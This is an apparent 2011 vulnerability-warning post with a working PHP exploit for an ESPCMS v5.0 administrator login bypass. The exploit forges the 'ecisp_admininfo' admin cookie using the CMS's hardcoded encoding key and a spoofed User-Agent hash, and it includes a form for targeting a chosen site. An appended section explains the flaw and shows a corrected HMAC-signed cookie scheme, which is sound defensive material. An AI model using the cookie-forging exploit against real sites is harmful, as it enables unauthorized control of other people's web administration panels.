ESPCMS v5.0 administrator login bypass EXP - vulnerability warning - Black Bar Safety Net

2011-04-27T00:00:00
ID MYHACK58:62201130215
Type myhack58
Reporter Anonymous
Modified 2011-04-27T00:00:00

Description

Publishing author: sub-meter

Vulnerability type: cookie spoofing

Vulnerability analysis: the admin back-end pages have a cookie authentication vulnerability; a spoofed cookie can be used to get into the back end.

EXP:

<?php
// eccode(): reversible transform with a key fixed in the default argument.
// Each byte is shifted by a key byte, then the result is URL-safe base64 encoded.
function eccode($string, $operation = 'DECODE', $key = '@LFK24s224%@safS3s%1f%') {
    $result = '';
    if ($operation == 'ENCODE') {
        for ($i = 0; $i < strlen($string); $i++) {
            $char = substr($string, $i, 1);
            $keychar = substr($key, ($i % strlen($key)) - 1, 1);
            $char = chr(ord($char) + ord($keychar));
            $result .= $char;
        }
        $result = base64_encode($result);
        $result = str_replace(array('+', '/', '='), array('-', '_', ''), $result);
    } elseif ($operation == 'DECODE') {
        $data = str_replace(array('-', '_'), array('+', '/'), $string);
        $mod4 = strlen($data) % 4;
        if ($mod4) {
            $data .= substr('====', $mod4);
        }
        $string = base64_decode($data);
        for ($i = 0; $i < strlen($string); $i++) {
            $char = substr($string, $i, 1);
            $keychar = substr($key, ($i % strlen($key)) - 1, 1);
            $char = chr(ord($char) - ord($keychar));
            $result .= $char;
        }
    }
    return $result;
}

define('admin_AGENT', $_SERVER['HTTP_USER_AGENT']);
$name = $_POST['name'];
$s = md5(admin_AGENT);
// Cookie fields are joined with "|"; the last one is md5 of the admin URL.
$ecisp_admininfo = '1|admin|e00cf25ad42683b3df678c61f42c6bda|'.$s.'|1|1|'.md5("http://".$name."/adminsoft");
$a = eccode($ecisp_admininfo, 'ENCODE');
echo "ecisp_admininfo=".$a."; esp_powerlist=hqy4;"."<br><br><br>";
?>
<form method="post" action="http://www.zyday.com/exp/espcmsv50.php" enctype="multipart/form-data" id="upload">
<label>
<input name="name" type="text" value="www.zyday.com" />
</label>
<div></div>
<input name="respondids" value="give me COOKIES" type="submit">
</form>

http://www.zyday.com/exp/espcmsv50.php is the address of this file; please modify it.
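The EXP above needs nothing secret to the target site: the key is the default argument of eccode(), and the other inputs (User-Agent, host name) are chosen by the client. As an added example (not ESPCMS code and not part of the original post), the PHP below shows the corrected pattern, a cookie authenticated with an HMAC keyed by a per-installation secret; the helper names and the "payload.tag" layout are assumptions made for illustration.

```php
<?php
// Added example, not ESPCMS code. All helper names are hypothetical.

// Assumption: generated once per installation and stored outside the web
// root; created inline here so the script runs on its own.
$siteSecret = random_bytes(32);

function b64url(string $bin): string {
    return rtrim(strtr(base64_encode($bin), '+/', '-_'), '=');
}

// Issue "payload.tag", where tag = HMAC-SHA256(site secret, payload).
function issue_admin_cookie(string $secret, int $uid, string $user, int $ttl = 1800): string {
    $claims  = ['uid' => $uid, 'user' => $user, 'exp' => time() + $ttl];
    $payload = b64url(json_encode($claims));
    return $payload . '.' . b64url(hash_hmac('sha256', $payload, $secret, true));
}

// Return the claims array, or null when the tag or the expiry check fails.
function verify_admin_cookie(string $secret, string $cookie): ?array {
    $parts = explode('.', $cookie);
    if (count($parts) !== 2) {
        return null;
    }
    [$payload, $tag] = $parts;
    $expected = b64url(hash_hmac('sha256', $payload, $secret, true));
    if (!hash_equals($expected, $tag)) {   // constant-time comparison
        return null;
    }
    $json   = base64_decode(strtr($payload, '-_', '+/'), true);
    $claims = $json === false ? null : json_decode($json, true);
    if (!is_array($claims) || ($claims['exp'] ?? 0) < time()) {
        return null;
    }
    return $claims;
}

// Constructed demo values.
$good = issue_admin_cookie($siteSecret, 1, 'admin');
// Same payload, but tagged with a key that is not this site's secret.
$forged = explode('.', $good)[0] . '.'
    . b64url(hash_hmac('sha256', explode('.', $good)[0], 'key-known-to-everyone', true));

var_dump(verify_admin_cookie($siteSecret, $good) !== null);
var_dump(verify_admin_cookie($siteSecret, $forged) === null);
```

Rotating the site secret invalidates every outstanding cookie. A random server-side session ID reaches the same goal without placing any claims in the cookie.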